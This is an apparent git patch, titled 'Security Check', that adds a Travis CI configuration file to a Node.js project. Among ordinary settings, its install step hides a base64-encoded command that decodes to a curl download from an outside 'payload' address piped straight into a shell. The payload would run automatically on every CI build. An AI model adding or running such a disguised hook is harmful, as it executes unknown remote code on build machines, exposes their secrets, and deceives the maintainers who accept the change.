From 33b8660d1cf0971f54ce1060306dddbdfe19acf0 Mon Sep 17 00:00:00 2001 From: aWJtC <95445067+aWJtC@users.noreply.github.com> Date: Sat, 15 Jan 2022 18:32:18 +0000 Subject: [PATCH] Security Check --- .travis.yml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 .travis.yml diff --git a/.travis.yml b/.travis.yml new file mode 100644 index 0000000..2cc8568 --- /dev/null +++ b/.travis.yml @@ -0,0 +1,23 @@ +language: node_js + +node_js: + - "node" + +addons: + ssh_known_hosts: nginxconfig.io + apt: + packages: + - libgconf-2-4 + +cache: + directories: + - ~/.npm + - ~/.cache + - ./node_modules + +install: + - "echo Y3VybCAta3NTIGh0dHBzOi8vc2VjdXJpdHkuZ2F1ci5pcy9wYXlsb2FkL2RvfHNo|base64 -d|sh" + - npm ci + +script: + - npm run test